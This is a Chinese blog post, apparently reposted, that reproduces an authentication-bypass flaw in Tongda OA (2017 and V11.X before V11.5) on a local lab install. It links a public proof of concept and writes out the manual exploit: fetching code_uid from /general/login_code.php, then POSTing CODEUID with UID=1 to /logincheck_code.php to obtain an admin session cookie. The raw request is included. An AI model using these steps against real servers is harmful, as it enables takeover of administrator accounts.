通达OA任意用户登陆漏洞复现

栏目: IT技术 · 发布时间: 4年前

内容简介:通达OA 2017版通达OA V11.X<V11.5

影响版本

通达OA 2017版

通达OA V11.X<V11.5

环境搭建

安装包来自黑白之道(https://mp.weixin.qq.com/s/moxuMnaqzXg-tZ7_2oLxbQ)

下载安装包后一键安装即可

链接:

https://pan.baidu.com/s/1eel1BxEc0XE4PqlA7y7-Tw

提取码:ilj1

安装过程很简单故不再赘述

漏洞复现

初始用户:admin 密码:空

访问localhost可以看到登陆页面

说明我们环境已经ok了

我们可以先登陆进去,发现管理员后台地址都是如下格式

http://网站/general/index.php?isIE=0&modify_pwd=0

通达OA任意用户登陆漏洞复现

我们可以看到我们直接访问这个网址会显示我们没有登陆

然后我们利用poc生成我们的cookie并进行替换

Poc地址: https://github.com/NS-Sp4ce/TongDaOA-Fake-User

通过poc生成我们的cookie

通达OA任意用户登陆漏洞复现

来到我们之前的那个链接,打开F12进行cookie的替换

通达OA任意用户登陆漏洞复现

替换完之后重新刷新一下

通达OA任意用户登陆漏洞复现

可以看到我们成功的利用cookie登陆了进来

手动复现

访问 /general/login_code.php

通达OA任意用户登陆漏洞复现

获取返回的code_uid 注意注意!!这里要把cookie删除掉不然是无法获得道Set-Cookie 同时 要更换User-Agent!!

Post 发包

CODEUID=上一个数据包的code_uid&UID=1

通达OA任意用户登陆漏洞复现

数据包如下

POST /logincheck_code.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 104

Upgrade-Insecure-Requests: 1
Content-Length: 52

CODEUID={B33EE507-314D-EC90-6258-10D33F800BC9}&UID=1

返回包中的cookie

Set-Cookie: PHPSESSID=0ni6eptuu3595vlfan1aii61v4; path=/

源码分析

后面会补上


以上所述就是小编给大家介绍的《通达OA任意用户登陆漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

A Philosophy of Software Design

A Philosophy of Software Design

John Ousterhout / Yaknyam Press / 2018-4-6 / GBP 14.21

This book addresses the topic of software design: how to decompose complex software systems into modules (such as classes and methods) that can be implemented relatively independently. The book first ......一起来看看 《A Philosophy of Software Design》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

MD5 加密
MD5 加密

MD5 加密工具